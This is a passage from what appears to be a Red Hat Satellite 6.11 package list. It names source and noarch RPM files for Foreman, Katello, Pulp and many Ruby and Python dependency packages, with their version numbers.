tfm-rubygem-hammer_cli_foreman-3.1.0.1-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_admin-1.1.0-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_ansible-0.3.4-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_azure_rm-0.2.2-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-2.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_discovery-1.1.0-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_kubevirt-0.1.5-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_leapp-0.1.1-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_openscap-0.1.13-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_puppet-0.0.5-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_remote_execution-0.2.2-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_tasks-0.0.17-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_templates-0.2.0-2.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.9-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_webhooks-0.0.2-1.el7sat.src.rpm tfm-rubygem-hammer_cli_katello-1.3.1.6-1.el7sat.src.rpm tfm-rubygem-hashie-3.6.0-3.el7sat.src.rpm tfm-rubygem-highline-2.0.3-2.el7sat.src.rpm tfm-rubygem-hocon-1.3.1-2.el7sat.src.rpm tfm-rubygem-http-3.3.0-2.el7sat.src.rpm tfm-rubygem-http-cookie-1.0.2-5.1.el7sat.src.rpm tfm-rubygem-http-form_data-2.1.1-2.el7sat.src.rpm tfm-rubygem-http_parser.rb-0.6.0-3.1.el7sat.src.rpm tfm-rubygem-httpclient-2.8.3-4.el7sat.src.rpm tfm-rubygem-i18n-1.8.2-2.el7sat.src.rpm tfm-rubygem-infoblox-3.0.0-4.el7sat.src.rpm tfm-rubygem-ipaddress-0.8.0-13.el7sat.src.rpm tfm-rubygem-jgrep-1.3.3-13.el7sat.src.rpm tfm-rubygem-journald-logger-2.0.4-3.el7sat.src.rpm tfm-rubygem-journald-native-1.0.11-4.1.el7sat.src.rpm tfm-rubygem-jwt-2.2.2-2.el7sat.src.rpm tfm-rubygem-kafo-6.4.0-1.el7sat.src.rpm tfm-rubygem-kafo_parsers-1.2.1-1.el7sat.src.rpm tfm-rubygem-kafo_wizards-0.0.2-2.el7sat.src.rpm tfm-rubygem-katello-4.3.0.42-1.el7sat.src.rpm tfm-rubygem-kubeclient-4.3.0-2.el7sat.src.rpm tfm-rubygem-ldap_fluff-0.6.0-1.el7sat.src.rpm tfm-rubygem-little-plugger-1.1.4-3.el7sat.src.rpm tfm-rubygem-locale-2.0.9-15.el7sat.src.rpm tfm-rubygem-logging-2.3.0-2.el7sat.src.rpm tfm-rubygem-logging-journald-2.0.0-3.el7sat.src.rpm tfm-rubygem-loofah-2.4.0-2.el7sat.src.rpm tfm-rubygem-mail-2.7.1-2.el7sat.src.rpm tfm-rubygem-marcel-1.0.1-1.el7sat.src.rpm tfm-rubygem-memoist-0.16.0-3.el7sat.src.rpm tfm-rubygem-method_source-0.9.2-3.el7sat.src.rpm tfm-rubygem-mime-types-3.3.1-2.el7sat.src.rpm tfm-rubygem-mime-types-data-3.2018.0812-5.el7sat.src.rpm tfm-rubygem-mini_mime-1.0.2-2.el7sat.src.rpm tfm-rubygem-mini_portile2-2.5.1-1.el7sat.src.rpm tfm-rubygem-mqtt-0.5.0-1.el7sat.src.rpm tfm-rubygem-ms_rest-0.7.6-1.el7sat.src.rpm tfm-rubygem-ms_rest_azure-0.12.0-1.el7sat.src.rpm tfm-rubygem-msgpack-1.3.3-2.1.el7sat.src.rpm tfm-rubygem-multi_json-1.14.1-3.el7sat.src.rpm tfm-rubygem-multipart-post-2.0.0-3.el7sat.src.rpm tfm-rubygem-mustermann-1.1.1-1.el7sat.src.rpm tfm-rubygem-net-ldap-0.17.0-2.el7sat.src.rpm tfm-rubygem-net-ping-2.0.1-5.el7sat.src.rpm tfm-rubygem-net-scp-1.2.1-5.el7sat.src.rpm tfm-rubygem-net-ssh-4.2.0-3.el7sat.src.rpm tfm-rubygem-net-ssh-krb-0.4.0-4.el7sat.src.rpm tfm-rubygem-net_http_unix-0.2.2-2.el7sat.src.rpm tfm-rubygem-netrc-0.11.0-6.el7sat.src.rpm tfm-rubygem-newt-0.9.7-3.1.el7sat.src.rpm tfm-rubygem-nio4r-2.5.4-2.1.el7sat.src.rpm tfm-rubygem-nokogiri-1.11.3-2.el7sat.src.rpm tfm-rubygem-oauth-0.5.4-5.el7sat.src.rpm tfm-rubygem-openscap-0.4.9-7.el7sat.src.rpm tfm-rubygem-openscap_parser-1.0.2-2.el7sat.src.rpm tfm-rubygem-optimist-3.0.0-3.el7sat.src.rpm tfm-rubygem-os-1.0.0-3.el7sat.src.rpm tfm-rubygem-ovirt-engine-sdk-4.4.0-2.1.el7sat.src.rpm tfm-rubygem-ovirt_provision_plugin-2.0.3-3.el7sat.src.rpm tfm-rubygem-parallel-1.19.1-2.el7sat.src.rpm tfm-rubygem-parse-cron-0.1.4-5.el7sat.src.rpm tfm-rubygem-pg-1.1.4-4.1.el7sat.src.rpm tfm-rubygem-polyglot-0.3.5-3.1.el7sat.src.rpm tfm-rubygem-powerbar-2.0.1-3.el7sat.src.rpm tfm-rubygem-prometheus-client-1.0.0-3.el7sat.src.rpm tfm-rubygem-promise.rb-0.7.4-3.el7sat.src.rpm tfm-rubygem-public_suffix-3.0.3-3.el7sat.src.rpm tfm-rubygem-pulp_ansible_client-0.10.1-1.el7sat.src.rpm tfm-rubygem-pulp_certguard_client-1.5.0-1.el7sat.src.rpm tfm-rubygem-pulp_container_client-2.9.0-1.el7sat.src.rpm tfm-rubygem-pulp_deb_client-2.16.0-1.el7sat.src.rpm tfm-rubygem-pulp_file_client-1.10.0-1.el7sat.src.rpm tfm-rubygem-pulp_ostree_client-2.0.0-0.1.a1.el7sat.src.rpm tfm-rubygem-pulp_python_client-3.5.2-1.el7sat.src.rpm tfm-rubygem-pulp_rpm_client-3.17.4-1.el7sat.src.rpm tfm-rubygem-pulpcore_client-3.16.7-1.el7sat.src.rpm tfm-rubygem-puma-5.6.2-1.el7sat.src.rpm tfm-rubygem-puma-status-1.3-1.el7sat.src.rpm tfm-rubygem-qpid_proton-0.33.0-5.el7sat.src.rpm tfm-rubygem-quantile-0.2.0-5.el7sat.src.rpm tfm-rubygem-rabl-0.14.3-2.el7sat.src.rpm tfm-rubygem-racc-1.5.2-1.el7sat.src.rpm tfm-rubygem-rack-2.2.3-2.el7sat.src.rpm tfm-rubygem-rack-cors-1.0.2-3.el7sat.src.rpm tfm-rubygem-rack-jsonp-1.3.1-10.el7sat.src.rpm tfm-rubygem-rack-protection-2.1.0-2.el7sat.src.rpm tfm-rubygem-rack-test-1.1.0-5.el7sat.src.rpm tfm-rubygem-rails-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-rails-dom-testing-2.0.3-7.el7sat.src.rpm tfm-rubygem-rails-html-sanitizer-1.3.0-2.el7sat.src.rpm tfm-rubygem-rails-i18n-6.0.0-3.el7sat.src.rpm tfm-rubygem-railties-6.0.4.7-1.el7sat.src.rpm tfm-rubygem-rainbow-2.2.2-1.el7sat.src.rpm tfm-rubygem-rb-inotify-0.9.7-6.el7sat.src.rpm tfm-rubygem-rbnacl-4.0.2-2.el7sat.src.rpm tfm-rubygem-rbvmomi-2.2.0-4.el7sat.src.rpm tfm-rubygem-record_tag_helper-1.0.1-4.el7sat.src.rpm tfm-rubygem-recursive-open-struct-1.1.0-2.el7sat.src.rpm tfm-rubygem-redfish_client-0.5.2-2.el7sat.src.rpm tfm-rubygem-redis-4.5.1-1.el7sat.src.rpm tfm-rubygem-representable-3.0.4-3.el7sat.src.rpm tfm-rubygem-responders-3.0.0-4.el7sat.src.rpm tfm-rubygem-rest-client-2.0.2-4.el7sat.src.rpm tfm-rubygem-retriable-3.1.2-3.el7sat.src.rpm tfm-rubygem-rkerberos-0.1.5-20.1.el7sat.src.rpm tfm-rubygem-roadie-3.4.0-4.el7sat.src.rpm tfm-rubygem-roadie-rails-2.1.1-3.el7sat.src.rpm tfm-rubygem-robotex-1.0.0-22.el7sat.src.rpm tfm-rubygem-rsec-0.4.3-5.el7sat.src.rpm tfm-rubygem-ruby-libvirt-0.7.1-2.1.el7sat.src.rpm tfm-rubygem-ruby2_keywords-0.0.4-1.el7sat.src.rpm tfm-rubygem-ruby2ruby-2.4.2-4.el7sat.src.rpm tfm-rubygem-ruby_parser-3.10.1-4.el7sat.src.rpm tfm-rubygem-rubyipmi-0.11.0-1.el7sat.src.rpm tfm-rubygem-runcible-2.13.1-2.el7sat.src.rpm tfm-rubygem-safemode-1.3.6-2.el7sat.src.rpm tfm-rubygem-scoped_search-4.1.9-2.el7sat.src.rpm tfm-rubygem-sd_notify-0.1.0-2.el7sat.src.rpm tfm-rubygem-secure_headers-6.3.0-3.el7sat.src.rpm tfm-rubygem-sequel-5.42.0-2.el7sat.src.rpm tfm-rubygem-server_sent_events-0.1.2-2.el7sat.src.rpm tfm-rubygem-sexp_processor-4.10.0-7.el7sat.src.rpm tfm-rubygem-sidekiq-5.2.10-1.el7sat.src.rpm tfm-rubygem-signet-0.14.0-2.el7sat.src.rpm tfm-rubygem-sinatra-2.1.0-3.el7sat.src.rpm tfm-rubygem-smart_proxy_ansible-3.3.1-2.el7sat.src.rpm tfm-rubygem-smart_proxy_container_gateway-1.0.6-1.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-6.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-5.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-8.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery_image-1.3.2-3.el7sat.src.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.1.0-6.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow-0.6.3-1.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow_core-0.4.1-1.el7sat.src.rpm tfm-rubygem-smart_proxy_openscap-0.9.2-1.el7sat.src.rpm tfm-rubygem-smart_proxy_pulp-3.2.0-2.el7sat.src.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.5.3-1.el7sat.src.rpm tfm-rubygem-smart_proxy_shellhooks-0.9.2-2.el7sat.src.rpm tfm-rubygem-sprockets-4.0.2-2.el7sat.src.rpm tfm-rubygem-sprockets-rails-3.2.1-7.el7sat.src.rpm tfm-rubygem-sqlite3-1.3.13-7.1.el7sat.src.rpm tfm-rubygem-sshkey-1.9.0-5.el7sat.src.rpm tfm-rubygem-statsd-instrument-2.1.4-4.el7sat.src.rpm tfm-rubygem-stomp-1.4.9-2.el7sat.src.rpm tfm-rubygem-thor-1.0.1-3.el7sat.src.rpm tfm-rubygem-thread_safe-0.3.6-6.el7sat.src.rpm tfm-rubygem-tilt-2.0.8-5.el7sat.src.rpm tfm-rubygem-timeliness-0.3.10-2.el7sat.src.rpm tfm-rubygem-tzinfo-1.2.6-2.el7sat.src.rpm tfm-rubygem-uber-0.1.0-3.el7sat.src.rpm tfm-rubygem-unf-0.1.3-9.el7sat.src.rpm tfm-rubygem-unf_ext-0.0.7.2-4.1.el7sat.src.rpm tfm-rubygem-unicode-0.4.4.4-4.1.el7sat.src.rpm tfm-rubygem-unicode-display_width-1.7.0-2.el7sat.src.rpm tfm-rubygem-validates_lengths_from_database-0.5.0-8.el7sat.src.rpm tfm-rubygem-webpack-rails-0.9.8-6.1.el7sat.src.rpm tfm-rubygem-websocket-driver-0.7.1-2.1.el7sat.src.rpm tfm-rubygem-websocket-extensions-0.1.5-2.el7sat.src.rpm tfm-rubygem-will_paginate-3.1.7-4.el7sat.src.rpm tfm-rubygem-xmlrpc-0.3.0-3.el7sat.src.rpm tfm-rubygem-zeitwerk-2.2.2-2.el7sat.src.rpm yggdrasil-worker-forwarder-0.0.1-1.el7sat.src.rpm noarch: ansible-collection-redhat-satellite-3.3.0-1.el7sat.noarch.rpm ansible-collection-redhat-satellite_operations-1.2.3-1.el7sat.noarch.rpm ansible-runner-1.4.7-1.el7ar.noarch.rpm ansiblerole-foreman_scap_client-0.2.0-2.el7sat.noarch.rpm ansiblerole-insights-client-1.7.1-2.el7sat.noarch.rpm candlepin-4.1.13-1.el7sat.noarch.rpm candlepin-selinux-4.1.13-1.el7sat.noarch.rpm foreman-3.1.1.21-2.el7sat.noarch.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm foreman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm foreman-cli-3.1.1.21-2.el7sat.noarch.rpm foreman-debug-3.1.1.21-2.el7sat.noarch.rpm foreman-discovery-image-3.8.2-1.el7sat.noarch.rpm foreman-dynflow-sidekiq-3.1.1.21-2.el7sat.noarch.rpm foreman-ec2-3.1.1.21-2.el7sat.noarch.rpm foreman-gce-3.1.1.21-2.el7sat.noarch.rpm foreman-installer-3.1.2.6-1.el7sat.noarch.rpm foreman-installer-katello-3.1.2.6-1.el7sat.noarch.rpm foreman-journald-3.1.1.21-2.el7sat.noarch.rpm foreman-libvirt-3.1.1.21-2.el7sat.noarch.rpm foreman-openstack-3.1.1.21-2.el7sat.noarch.rpm foreman-ovirt-3.1.1.21-2.el7sat.noarch.rpm foreman-postgresql-3.1.1.21-2.el7sat.noarch.rpm foreman-proxy-3.1.1.1-1.el7sat.noarch.rpm foreman-proxy-journald-3.1.1.1-1.el7sat.noarch.rpm foreman-selinux-3.1.2.1-1.el7sat.noarch.rpm foreman-service-3.1.1.21-2.el7sat.noarch.rpm foreman-telemetry-3.1.1.21-2.el7sat.noarch.rpm foreman-vmware-3.1.1.21-2.el7sat.noarch.rpm katello-4.3.0-3.el7sat.noarch.rpm katello-certs-tools-2.9.0-1.el7sat.noarch.rpm katello-client-bootstrap-1.7.9-1.el7sat.noarch.rpm katello-common-4.3.0-3.el7sat.noarch.rpm katello-debug-4.3.0-3.el7sat.noarch.rpm katello-selinux-4.0.2-1.el7sat.noarch.rpm keycloak-httpd-client-install-1.2.2-2.el7sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm puppetlabs-stdlib-5.2.0-1.el7sat.noarch.rpm puppetserver-7.4.2-1.el7sat.noarch.rpm python-gofer-2.12.5-7.el7sat.noarch.rpm python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm python-qpid-1.35.0-5.el7.noarch.rpm python2-ansible-runner-1.4.7-1.el7ar.noarch.rpm python2-daemon-2.1.2-7.2.el7sat.noarch.rpm python2-jinja2-2.10-10.el7sat.noarch.rpm python2-keycloak-httpd-client-install-1.2.2-2.el7sat.noarch.rpm python2-lockfile-0.11.0-10.el7ar.noarch.rpm python2-pexpect-4.6-1.el7at.noarch.rpm python2-ptyprocess-0.5.2-3.el7at.noarch.rpm qpid-dispatch-tools-1.14.0-1.el7_9.noarch.rpm qpid-tools-1.36.0-32.el7_9amq.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm rhel8-kickstart-setup-0.0.2-1.el7sat.noarch.rpm rubygem-clamp-1.1.2-7.el7sat.noarch.rpm rubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm rubygem-foreman_maintain-1.0.12-1.el7sat.noarch.rpm rubygem-foreman_scap_client-0.5.0-1.el7sat.noarch.rpm rubygem-highline-2.0.3-2.el7sat.noarch.rpm rubygem-oauth-0.5.4-2.el7sat.noarch.rpm satellite-6.11.0-2.el7sat.noarch.rpm satellite-cli-6.11.0-2.el7sat.noarch.rpm satellite-common-6.11.0-2.el7sat.noarch.rpm satellite-installer-6.11.0.7-1.el7sat.noarch.rpm satellite-maintain-0.0.1-1.el7sat.noarch.rpm tfm-pulpcore-python3-aiodns-3.0.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-aiofiles-0.7.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-aiohttp-xmlrpc-1.5.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-aioredis-2.0.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-aiosignal-1.2.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-ansible-builder-1.0.1-2.el7pc.noarch.rpm tfm-pulpcore-python3-asgiref-3.4.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-async-lru-1.0.2-2.el7pc.noarch.rpm tfm-pulpcore-python3-async-timeout-4.0.2-1.el7pc.noarch.rpm tfm-pulpcore-python3-asyncio-throttle-1.0.2-2.el7pc.noarch.rpm tfm-pulpcore-python3-attrs-21.2.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-backoff-1.11.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-bindep-2.10.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-bleach-3.3.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-bleach-allowlist-1.0.3-2.el7pc.noarch.rpm tfm-pulpcore-python3-certifi-2020.6.20-2.el7pc.noarch.rpm tfm-pulpcore-python3-chardet-3.0.4-3.el7pc.noarch.rpm tfm-pulpcore-python3-charset-normalizer-2.0.7-1.el7pc.noarch.rpm tfm-pulpcore-python3-click-8.0.3-1.el7pc.noarch.rpm tfm-pulpcore-python3-click-shell-2.1-2.el7pc.noarch.rpm tfm-pulpcore-python3-colorama-0.4.4-2.el7pc.noarch.rpm tfm-pulpcore-python3-contextlib2-21.6.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-dateutil-2.8.2-1.el7pc.noarch.rpm tfm-pulpcore-python3-debian-0.1.42-1.el7pc.noarch.rpm tfm-pulpcore-python3-defusedxml-0.7.1-2.el7pc.noarch.rpm tfm-pulpcore-python3-diff-match-patch-20200713-2.el7pc.noarch.rpm tfm-pulpcore-python3-distro-1.6.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-django-3.2.13-1.el7pc.noarch.rpm tfm-pulpcore-python3-django-currentuser-0.5.3-3.el7pc.noarch.rpm tfm-pulpcore-python3-django-filter-21.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-django-guardian-2.4.0-3.el7pc.noarch.rpm tfm-pulpcore-python3-django-guid-3.2.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-django-import-export-2.6.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-django-lifecycle-0.9.3-1.el7pc.noarch.rpm tfm-pulpcore-python3-django-prometheus-2.1.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-django-readonly-field-1.0.5-3.el7pc.noarch.rpm tfm-pulpcore-python3-djangorestframework-3.12.4-4.el7pc.noarch.rpm tfm-pulpcore-python3-djangorestframework-queryfields-1.0.0-4.el7pc.noarch.rpm tfm-pulpcore-python3-drf-access-policy-1.1.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-drf-nested-routers-0.93.3-3.el7pc.noarch.rpm tfm-pulpcore-python3-drf-spectacular-0.20.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-dynaconf-3.1.7-2.el7pc.noarch.rpm tfm-pulpcore-python3-ecdsa-0.13.3-3.el7pc.noarch.rpm tfm-pulpcore-python3-et-xmlfile-1.1.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-flake8-3.9.2-3.el7pc.noarch.rpm tfm-pulpcore-python3-future-0.18.2-4.el7pc.noarch.rpm tfm-pulpcore-python3-galaxy-importer-0.4.1-2.el7pc.noarch.rpm tfm-pulpcore-python3-gnupg-0.4.7-2.el7pc.noarch.rpm tfm-pulpcore-python3-gunicorn-20.1.0-3.el7pc.noarch.rpm tfm-pulpcore-python3-idna-3.3-1.el7pc.noarch.rpm tfm-pulpcore-python3-idna-ssl-1.1.0-4.el7pc.noarch.rpm tfm-pulpcore-python3-importlib-metadata-1.7.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-inflection-0.5.1-2.el7pc.noarch.rpm tfm-pulpcore-python3-iniparse-0.4-34.el7pc.noarch.rpm tfm-pulpcore-python3-jinja2-3.0.2-1.el7pc.noarch.rpm tfm-pulpcore-python3-jsonschema-3.2.0-7.el7pc.noarch.rpm tfm-pulpcore-python3-markdown-3.3.4-4.el7pc.noarch.rpm tfm-pulpcore-python3-markuppy-1.14-2.el7pc.noarch.rpm tfm-pulpcore-python3-mccabe-0.6.1-2.el7pc.noarch.rpm tfm-pulpcore-python3-naya-1.1.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-odfpy-1.4.1-5.el7pc.noarch.rpm tfm-pulpcore-python3-openpyxl-3.0.9-1.el7pc.noarch.rpm tfm-pulpcore-python3-packaging-21.2-1.el7pc.noarch.rpm tfm-pulpcore-python3-parsley-1.3-1.el7pc.noarch.rpm tfm-pulpcore-python3-pbr-5.6.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-productmd-1.33-2.el7pc.noarch.rpm tfm-pulpcore-python3-prometheus-client-0.8.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-pulp-ansible-0.10.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-pulp-certguard-1.5.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-pulp-cli-0.14.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-pulp-container-2.9.2-1.el7pc.noarch.rpm tfm-pulpcore-python3-pulp-deb-2.16.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-pulp-file-1.10.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-pulp-rpm-3.17.5-1.1.el7pc.noarch.rpm tfm-pulpcore-python3-pulpcore-3.16.9-1.el7pc.noarch.rpm tfm-pulpcore-python3-pyOpenSSL-19.1.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-pycodestyle-2.7.0-4.el7pc.noarch.rpm tfm-pulpcore-python3-pycparser-2.20-2.el7pc.noarch.rpm tfm-pulpcore-python3-pyflakes-2.3.1-4.el7pc.noarch.rpm tfm-pulpcore-python3-pygments-2.10.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-pygtrie-2.4.2-2.el7pc.noarch.rpm tfm-pulpcore-python3-pyjwkest-1.4.2-5.el7pc.noarch.rpm tfm-pulpcore-python3-pyjwt-1.7.1-7.el7pc.noarch.rpm tfm-pulpcore-python3-pyparsing-2.4.7-2.el7pc.noarch.rpm tfm-pulpcore-python3-pytz-2021.3-1.el7pc.noarch.rpm tfm-pulpcore-python3-redis-3.5.3-2.el7pc.noarch.rpm tfm-pulpcore-python3-requests-2.26.0-3.el7pc.noarch.rpm tfm-pulpcore-python3-requirements-parser-0.2.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-schema-0.7.5-1.el7pc.noarch.rpm tfm-pulpcore-python3-semantic-version-2.8.5-2.el7pc.noarch.rpm tfm-pulpcore-python3-six-1.16.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-sqlparse-0.4.2-2.el7pc.noarch.rpm tfm-pulpcore-python3-tablib-3.1.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-toml-0.10.2-2.el7pc.noarch.rpm tfm-pulpcore-python3-typing-extensions-3.10.0.2-1.el7pc.noarch.rpm tfm-pulpcore-python3-uritemplate-4.1.1-1.el7pc.noarch.rpm tfm-pulpcore-python3-url-normalize-1.4.3-3.el7pc.noarch.rpm tfm-pulpcore-python3-urllib3-1.26.7-1.el7pc.noarch.rpm tfm-pulpcore-python3-urlman-1.4.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-webencodings-0.5.1-2.el7pc.noarch.rpm tfm-pulpcore-python3-whitenoise-5.3.0-1.el7pc.noarch.rpm tfm-pulpcore-python3-xlrd-2.0.1-4.el7pc.noarch.rpm tfm-pulpcore-python3-xlwt-1.3.0-2.el7pc.noarch.rpm tfm-pulpcore-python3-zipp-3.4.0-3.el7pc.noarch.rpm tfm-rubygem-actioncable-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-actionmailbox-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-actionmailer-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-actionpack-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-actiontext-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-actionview-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-activejob-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-activemodel-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-activerecord-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-activerecord-import-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-activerecord-session_store-2.0.0-1.el7sat.noarch.rpm tfm-rubygem-activestorage-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-activesupport-6.0.4.7-1.el7sat.noarch.rpm tfm-rubygem-acts_as_list-1.0.3-2.el7sat.noarch.rpm tfm-rubygem-addressable-2.8.0-1.el7sat.noarch.rpm tfm-rubygem-algebrick-0.7.3-8.el7sat.noarch.rpm tfm-rubygem-amazing_print-1.1.0-2.el7sat.noarch.rpm tfm-rubygem-ancestry-3.0.7-2.el7sat.noarch.rpm tfm-rubygem-anemone-0.7.2-23.el7sat.noarch.rpm tfm-rubygem-angular-rails-templates-1.1.0-2.el7sat.noarch.rpm tfm-rubygem-ansi-1.5.0-3.el7sat.noarch.rpm tfm-rubygem-apipie-bindings-0.4.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-dsl-2.3.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-params-0.0.5-5.1.el7sat.noarch.rpm tfm-rubygem-apipie-rails-0.5.17-4.el7sat.noarch.rpm tfm-rubygem-audited-4.9.0-4.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_compute-0.22.0-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_network-0.26.1-2.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_resources-0.18.2-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_storage-0.23.0-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_subscriptions-0.18.5-1.el7sat.noarch.rpm tfm-rubygem-builder-3.2.4-2.el7sat.noarch.rpm tfm-rubygem-bundler_ext-0.4.1-6.el7sat.noarch.rpm tfm-rubygem-clamp-1.1.2-7.el7sat.noarch.rpm tfm-rubygem-coffee-rails-5.0.0-2.el7sat.noarch.rpm tfm-rubygem-coffee-script-2.4.1-5.el7sat.noarch.rpm tfm-rubygem-coffee-script-source-1.12.2-5.el7sat.noarch.rpm tfm-rubygem-colorize-0.8.1-2.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-1.1.6-3.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-3.el7sat.noarch.rpm tfm-rubygem-connection_pool-2.2.2-3.el7sat.noarch.rpm tfm-rubygem-crass-1.0.6-2.el7sat.noarch.rpm tfm-rubygem-css_parser-1.4.7-5.el7sat.noarch.rpm tfm-rubygem-daemons-1.2.3-7.1.el7sat.noarch.rpm tfm-rubygem-deacon-1.0.0-5.el7sat.noarch.rpm tfm-rubygem-declarative-0.0.10-3.el7sat.noarch.rpm tfm-rubygem-declarative-option-0.1.0-3.el7sat.noarch.rpm tfm-rubygem-deep_cloneable-3.0.0-4.el7sat.noarch.rpm tfm-rubygem-deface-1.5.3-3.el7sat.noarch.rpm tfm-rubygem-diffy-3.0.1-6.1.el7sat.noarch.rpm tfm-rubygem-domain_name-0.5.20160310-5.el7sat.noarch.rpm tfm-rubygem-dynflow-1.6.4-1.el7sat.noarch.rpm tfm-rubygem-erubi-1.9.0-2.el7sat.noarch.rpm tfm-rubygem-excon-0.76.0-2.el7sat.noarch.rpm tfm-rubygem-execjs-2.7.0-5.el7sat.noarch.rpm tfm-rubygem-faraday-0.17.3-2.el7sat.noarch.rpm tfm-rubygem-faraday-cookie_jar-0.0.6-2.el7sat.noarch.rpm tfm-rubygem-faraday_middleware-0.13.1-3.el7sat.noarch.rpm tfm-rubygem-fast_gettext-1.4.1-5.el7sat.noarch.rpm tfm-rubygem-fog-aws-3.6.5-2.el7sat.noarch.rpm tfm-rubygem-fog-core-2.1.0-4.el7sat.noarch.rpm tfm-rubygem-fog-google-1.11.0-2.el7sat.noarch.rpm tfm-rubygem-fog-json-1.2.0-4.el7sat.noarch.rpm tfm-rubygem-fog-kubevirt-1.3.3-2.el7sat.noarch.rpm tfm-rubygem-fog-libvirt-0.9.0-1.el7sat.noarch.rpm tfm-rubygem-fog-openstack-1.0.8-4.el7sat.noarch.rpm tfm-rubygem-fog-ovirt-2.0.1-2.el7sat.noarch.rpm tfm-rubygem-fog-vsphere-3.5.1-1.el7sat.noarch.rpm tfm-rubygem-fog-xml-0.1.2-9.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-5.2.3-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible-7.0.4.1-1.el7sat.noarch.rpm tfm-rubygem-foreman_azure_rm-2.2.6-1.el7sat.noarch.rpm tfm-rubygem-foreman_bootdisk-19.0.4.1-1.el7sat.noarch.rpm tfm-rubygem-foreman_discovery-19.0.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_hooks-0.3.17-2.el7sat.noarch.rpm tfm-rubygem-foreman_kubevirt-0.1.9-2.el7sat.noarch.rpm tfm-rubygem-foreman_leapp-0.1.9-1.el7sat.noarch.rpm tfm-rubygem-foreman_openscap-5.1.1-1.el7sat.noarch.rpm tfm-rubygem-foreman_puppet-2.0.6-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution-5.0.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution-cockpit-5.0.7-1.el7sat.noarch.rpm 